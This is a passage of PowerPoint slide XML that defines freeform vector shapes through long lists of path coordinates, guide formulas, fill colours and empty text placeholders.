                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="93"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36397" name="Freeform 129"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3438" y="2256"/>
                <a:ext cx="305" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 305"/>
                  <a:gd name="T1" fmla="*/ 47 h 278"/>
                  <a:gd name="T2" fmla="*/ 3 w 305"/>
                  <a:gd name="T3" fmla="*/ 39 h 278"/>
                  <a:gd name="T4" fmla="*/ 6 w 305"/>
                  <a:gd name="T5" fmla="*/ 28 h 278"/>
                  <a:gd name="T6" fmla="*/ 1 w 305"/>
                  <a:gd name="T7" fmla="*/ 22 h 278"/>
                  <a:gd name="T8" fmla="*/ 5 w 305"/>
                  <a:gd name="T9" fmla="*/ 7 h 278"/>
                  <a:gd name="T10" fmla="*/ 10 w 305"/>
                  <a:gd name="T11" fmla="*/ 0 h 278"/>
                  <a:gd name="T12" fmla="*/ 20 w 305"/>
                  <a:gd name="T13" fmla="*/ 12 h 278"/>
                  <a:gd name="T14" fmla="*/ 31 w 305"/>
                  <a:gd name="T15" fmla="*/ 19 h 278"/>
                  <a:gd name="T16" fmla="*/ 38 w 305"/>
                  <a:gd name="T17" fmla="*/ 19 h 278"/>
                  <a:gd name="T18" fmla="*/ 50 w 305"/>
                  <a:gd name="T19" fmla="*/ 8 h 278"/>
                  <a:gd name="T20" fmla="*/ 65 w 305"/>
                  <a:gd name="T21" fmla="*/ 5 h 278"/>
                  <a:gd name="T22" fmla="*/ 64 w 305"/>
                  <a:gd name="T23" fmla="*/ 11 h 278"/>
                  <a:gd name="T24" fmla="*/ 63 w 305"/>
                  <a:gd name="T25" fmla="*/ 19 h 278"/>
                  <a:gd name="T26" fmla="*/ 71 w 305"/>
                  <a:gd name="T27" fmla="*/ 27 h 278"/>
                  <a:gd name="T28" fmla="*/ 74 w 305"/>
                  <a:gd name="T29" fmla="*/ 42 h 278"/>
                  <a:gd name="T30" fmla="*/ 92 w 305"/>
                  <a:gd name="T31" fmla="*/ 51 h 278"/>
                  <a:gd name="T32" fmla="*/ 103 w 305"/>
                  <a:gd name="T33" fmla="*/ 62 h 278"/>
                  <a:gd name="T34" fmla="*/ 136 w 305"/>
                  <a:gd name="T35" fmla="*/ 64 h 278"/>
                  <a:gd name="T36" fmla="*/ 159 w 305"/>
                  <a:gd name="T37" fmla="*/ 57 h 278"/>
                  <a:gd name="T38" fmla="*/ 165 w 305"/>
                  <a:gd name="T39" fmla="*/ 48 h 278"/>
                  <a:gd name="T40" fmla="*/ 179 w 305"/>
                  <a:gd name="T41" fmla="*/ 35 h 278"/>
                  <a:gd name="T42" fmla="*/ 195 w 305"/>
                  <a:gd name="T43" fmla="*/ 32 h 278"/>
                  <a:gd name="T44" fmla="*/ 212 w 305"/>
                  <a:gd name="T45" fmla="*/ 36 h 278"/>
                  <a:gd name="T46" fmla="*/ 232 w 305"/>
                  <a:gd name="T47" fmla="*/ 43 h 278"/>
                  <a:gd name="T48" fmla="*/ 259 w 305"/>
                  <a:gd name="T49" fmla="*/ 64 h 278"/>
                  <a:gd name="T50" fmla="*/ 271 w 305"/>
                  <a:gd name="T51" fmla="*/ 73 h 278"/>
                  <a:gd name="T52" fmla="*/ 271 w 305"/>
                  <a:gd name="T53" fmla="*/ 86 h 278"/>
                  <a:gd name="T54" fmla="*/ 264 w 305"/>
                  <a:gd name="T55" fmla="*/ 110 h 278"/>
                  <a:gd name="T56" fmla="*/ 261 w 305"/>
                  <a:gd name="T57" fmla="*/ 121 h 278"/>
                  <a:gd name="T58" fmla="*/ 262 w 305"/>
                  <a:gd name="T59" fmla="*/ 134 h 278"/>
                  <a:gd name="T60" fmla="*/ 267 w 305"/>
                  <a:gd name="T61" fmla="*/ 162 h 278"/>
                  <a:gd name="T62" fmla="*/ 281 w 305"/>
                  <a:gd name="T63" fmla="*/ 169 h 278"/>
                  <a:gd name="T64" fmla="*/ 266 w 305"/>
                  <a:gd name="T65" fmla="*/ 192 h 278"/>
                  <a:gd name="T66" fmla="*/ 284 w 305"/>
                  <a:gd name="T67" fmla="*/ 217 h 278"/>
                  <a:gd name="T68" fmla="*/ 297 w 305"/>
                  <a:gd name="T69" fmla="*/ 236 h 278"/>
                  <a:gd name="T70" fmla="*/ 305 w 305"/>
                  <a:gd name="T71" fmla="*/ 249 h 278"/>
                  <a:gd name="T72" fmla="*/ 289 w 305"/>
                  <a:gd name="T73" fmla="*/ 254 h 278"/>
                  <a:gd name="T74" fmla="*/ 279 w 305"/>
                  <a:gd name="T75" fmla="*/ 270 h 278"/>
                  <a:gd name="T76" fmla="*/ 265 w 305"/>
                  <a:gd name="T77" fmla="*/ 275 h 278"/>
                  <a:gd name="T78" fmla="*/ 242 w 305"/>
                  <a:gd name="T79" fmla="*/ 273 h 278"/>
                  <a:gd name="T80" fmla="*/ 227 w 305"/>
                  <a:gd name="T81" fmla="*/ 269 h 278"/>
                  <a:gd name="T82" fmla="*/ 213 w 305"/>
                  <a:gd name="T83" fmla="*/ 266 h 278"/>
                  <a:gd name="T84" fmla="*/ 207 w 305"/>
                  <a:gd name="T85" fmla="*/ 260 h 278"/>
                  <a:gd name="T86" fmla="*/ 202 w 305"/>
                  <a:gd name="T87" fmla="*/ 244 h 278"/>
                  <a:gd name="T88" fmla="*/ 191 w 305"/>
                  <a:gd name="T89" fmla="*/ 241 h 278"/>
                  <a:gd name="T90" fmla="*/ 181 w 305"/>
                  <a:gd name="T91" fmla="*/ 244 h 278"/>
                  <a:gd name="T92" fmla="*/ 170 w 305"/>
                  <a:gd name="T93" fmla="*/ 254 h 278"/>
                  <a:gd name="T94" fmla="*/ 148 w 305"/>
                  <a:gd name="T95" fmla="*/ 245 h 278"/>
                  <a:gd name="T96" fmla="*/ 133 w 305"/>
                  <a:gd name="T97" fmla="*/ 233 h 278"/>
                  <a:gd name="T98" fmla="*/ 116 w 305"/>
                  <a:gd name="T99" fmla="*/ 225 h 278"/>
                  <a:gd name="T100" fmla="*/ 105 w 305"/>
                  <a:gd name="T101" fmla="*/ 200 h 278"/>
                  <a:gd name="T102" fmla="*/ 87 w 305"/>
                  <a:gd name="T103" fmla="*/ 189 h 278"/>
                  <a:gd name="T104" fmla="*/ 82 w 305"/>
                  <a:gd name="T105" fmla="*/ 180 h 278"/>
                  <a:gd name="T106" fmla="*/ 74 w 305"/>
                  <a:gd name="T107" fmla="*/ 189 h 278"/>
                  <a:gd name="T108" fmla="*/ 64 w 305"/>
                  <a:gd name="T109" fmla="*/ 182 h 278"/>
                  <a:gd name="T110" fmla="*/ 62 w 305"/>
                  <a:gd name="T111" fmla="*/ 173 h 278"/>
                  <a:gd name="T112" fmla="*/ 59 w 305"/>
                  <a:gd name="T113" fmla="*/ 160 h 278"/>
                  <a:gd name="T114" fmla="*/ 51 w 305"/>
                  <a:gd name="T115" fmla="*/ 147 h 278"/>
                  <a:gd name="T116" fmla="*/ 33 w 305"/>
                  <a:gd name="T117" fmla="*/ 138 h 278"/>
                  <a:gd name="T118" fmla="*/ 23 w 305"/>
                  <a:gd name="T119" fmla="*/ 118 h 278"/>
                  <a:gd name="T120" fmla="*/ 34 w 305"/>
                  <a:gd name="T121" fmla="*/ 94 h 278"/>
                  <a:gd name="T122" fmla="*/ 27 w 305"/>
                  <a:gd name="T123" fmla="*/ 79 h 278"/>
                  <a:gd name="T124" fmla="*/ 12 w 305"/>
                  <a:gd name="T125" fmla="*/ 53 h 278"/>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305"/>
                  <a:gd name="T190" fmla="*/ 0 h 278"/>
                  <a:gd name="T191" fmla="*/ 305 w 305"/>
                  <a:gd name="T192" fmla="*/ 278 h 278"/>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305" h="278">
                    <a:moveTo>
                      <a:pt x="12" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="53"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
